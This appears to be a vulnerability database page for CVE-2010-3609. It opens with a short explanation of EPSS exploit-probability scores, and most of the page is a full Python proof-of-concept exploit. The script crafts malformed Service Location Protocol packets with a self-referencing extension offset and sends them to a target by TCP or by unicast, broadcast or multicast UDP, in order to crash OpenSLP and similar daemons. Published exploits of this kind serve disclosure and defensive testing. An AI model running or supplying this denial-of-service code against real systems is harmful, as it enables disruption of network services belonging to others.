CVE-2010-3609 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/python # Title: OpenSLP DoS # Author: Nicolas Gregoire (@Agarri_FR) # CVE: 2010-3609 # Software download: http://www.openslp.org/download.html # Version: v1.2.1 and trunk before revision 1647 # Tested on: Linux Ubuntu 10.04, VMware ESX 4.0 # Notes: It affects some others SLP softwares, like mSLP. More details (in French) on my blog => http://goo.gl/s0zHq ''' ================================== Pseudo documentation ================================== ''' # SLPick, extension DoS release # by Nicolas Gregoire ''' ================================== Imports ================================== ''' import getopt import re import sys import binascii import struct import socket import os ''' ================================== Default values ================================== ''' version = '0.4' mode = 'unicast' source = 'N/A' target = 'N/A' xid = '\x12\x34' port = 427 nb = 1 req = 'sr' ''' ================================== Standard functions ================================== ''' # Some nice formatting def zprint(str): print '[=] ' + str # Function displaying CLI arguments def showUsage(): print 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]' print '\t[-h] Help (this text)' print '\t[-m] Mode : tcp / unicast / broadcast / multicast (default is "' + mode + '")' print '\t[-p] Port : default is "' + str(port) + '"' print '\t[-s] Source IP Adress : no default (used only in multicast mode)' print '\t[-t] Target IP Adress : no default (forced in multicast mode)' print '\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)' print '\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)' sys.exit(1) # Function parsing parameters def getArguments(): try: optlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:') except getopt.GetoptError: showUsage() for opt in optlist: if opt[0] == '-h': showUsage() if opt[0] == '-p': global port port = opt[1] if opt[0] == '-s': global source source = opt[1] if opt[0] == '-t': global target target = opt[1] if opt[0] == '-m': global mode mode = opt[1] if opt[0] == '-n': global nb nb = int(opt[1]) if opt[0] == '-r': global req req = opt[1] # Function checking parameters def checkArguments(): if (mode == 'multicast'): # XID : must be 0 in multicast mode # Target IP : default SLP multicast address # Source IP : address of the local interface global xid xid = '\x00\x00' zprint('Forcing XID to "0"') global target target = '239.255.255.253' zprint('Forcing target IP to "' + target + '"') if (source != 'N/A') : zprint('Forcing source IP to "' + source + '"') else: zprint('You need to force the source address with "-s" !') showUsage() elif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'): # Target IP : must be defined if (target == 'N/A') : zprint('Invalid target !') showUsage() else : zprint('Invalid mode !') showUsage() ''' ================================== SLP functions ================================== ''' # Define payload of type "Service Request" def getServRequest(): zprint('Creating payload of type "Service Request"') # Function type f = '\x01' # Empty fields previous_list_length = '\x00\x00' predicate_length = '\x00\x00' scope_length = '\x00\x00' spi_length = '\x00\x00' # Variable-size fields service = 'service:directory-agent' service_length = struct.pack('!h', len(service)) # Create message m = previous_list_length + service_length + service m += predicate_length + scope_length + spi_length return(f, m) # Define payload of type "Attribute Request" def getAttrRequest(): zprint('Creating payload of type "Attribue Request"') # Function type f = '\x06' # Empty fields previous_list_length = '\x00\x00' tag_length = '\x00\x00' spi_length = '\x00\x00' # Variable-size fields url = 'http://www.agarri.fr/' url_length = struct.pack('!h', len(url)) scope = 'default' scope_length = struct.pack('!h', len(scope)) # Create message m = previous_list_length m += url_length + url + scope_length + scope m += tag_length + spi_length return(f, m) # Define the function creating the full SLP packet def createPacket(function, message): zprint('Adding headers and trailers') # SLP Version version = '\x02' # Set the 'Multicast required' flag to 1 if (mode == 'broadcast' or mode == 'multicast'): flags = '\x20\x00' else: flags = '\x00\x00' ####################################################### # Here's the bug !!!! ####################################################### zprint('Using ' + str(nb) + ' extension(s)') if (nb == 0): # No extension == no bug next_ext_offset = '\x00\x00\x00' extension = '' elif (nb == 1): # Loop over itself next_ext_offset = '\x00\x00\x05' extension = '' elif (nb == 2) : # Point to another extension located at the end of the packet # TODO : Calculate it at runtime if (req == 'sr'): next_ext_offset = '\x00\x00\x31' else : next_ext_offset = '\x00\x00\x36' # OpenSLP : extid should be < 0x4000 or > 0x7FFF ext_id = '\xBA\xBE' # Loop over itself, 0x05 (back to previous extension) should work too ext_nextoffset = next_ext_offset # Could be anything ext_data = '\x22\x22' # Create the trailing extension extension = ext_id + ext_nextoffset + ext_data else: print 'Wrong number of extensions' sys.exit(1) # Variable-size headers lang = 'en' lang_length = struct.pack('!h', len(lang)) # Assemble headers headers = flags + next_ext_offset + xid + lang_length + lang # Packet = version + function + overall size + headers + message + extension packet = version + function + '\x00' packet += struct.pack('!h', len(headers + message + extension) + 5) packet += headers + message + extension return packet ''' ================================== Send packet via TCP or UDP ================================== ''' # Send via TCP def sendTcpPacket(packet): zprint('Sending packet via TCP [' + target + ']') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) try: s.connect((target, port)) except socket.error: zprint('Socket error (port closed ?)') sys.exit(1) s.send(packet) s.close # Send via unicast UDP def sendUnicastPacket(packet): zprint('Sending packet via Unicast UDP [' + target + ']') s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) s.sendto( packet, (target, port) ) # Send via broadcast UDP def sendBroadcastPacket(packet): zprint('Sending packet via Broadcast UDP [' + target + ']') s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) s.sendto( packet, (target, port) ) # Send via multicast UDP def sendMulticastPacket(packet): zprint('Sending packet via Multicast UDP [' + target + ']') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.bind((source, 6666)) # Select an interface (and an evil port ;-) sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) sock.sendto(packet, (target, port) ); ''' ================================== Main code ================================== ''' # Print banner zprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)') # Set options getArguments() checkArguments() # Which payload ? if (req == 'ar'): func, payload = getAttrRequest() else : func, payload = getServRequest() # Add headers and trailers (including extensions) packet = createPacket(func, payload) # TCP if (mode == 'tcp'): sendTcpPacket(packet) # UDP elif (mode == 'unicast'): sendUnicastPacket(packet) elif (mode == 'broadcast'): sendBroadcastPacket(packet) elif (mode == 'multicast'): sendMulticastPacket(packet) # Exit zprint('Exit')